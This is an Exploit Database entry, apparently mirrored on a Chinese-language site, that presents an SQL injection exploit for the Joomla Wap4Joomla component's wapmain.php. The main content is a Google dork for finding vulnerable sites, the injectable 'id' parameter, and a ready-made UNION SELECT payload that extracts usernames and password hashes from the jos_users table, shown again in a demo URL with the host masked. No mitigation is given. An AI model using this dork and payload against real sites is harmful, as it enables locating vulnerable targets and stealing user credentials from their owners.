Joomla! Component Wap4Joomla! – ‘wapmain.php’ SQL Injection

• Exploit Database
• 34 阅读

• 作者： Manas58
  日期： 2010-04-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12440/

• Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability
  
  ###########################
  
  Author: Manas58 
   
  Homepage: http://www.1923turk.com 
  
  Script: Joomlahttp://www.joomlaos.de/Downloads/Joomla_und_Mambo_Komponenten/Wap4Joomla.html 
  
  Download: http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,2088.html
  
  Dork: inurl:wapmain.php?option=
  ###########################
  
  [ Vulnerable File ] 
   
  
  wap/wapmain.php?option=onews&action=link&id= [ SQL ]
   
  
  [ XpL ]
  
  -1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
  
  [ Demo] 
   
  http://xxxxx/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
  
  
  
  ##############################################################
  # 
  # Gamoscu: http://gamoscu.wordpress.com/
  #
  # Baybora: http://baybora.wordpress.com/
  #
  # Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
  #
  #
  #
  #
  # 
  ##############################################################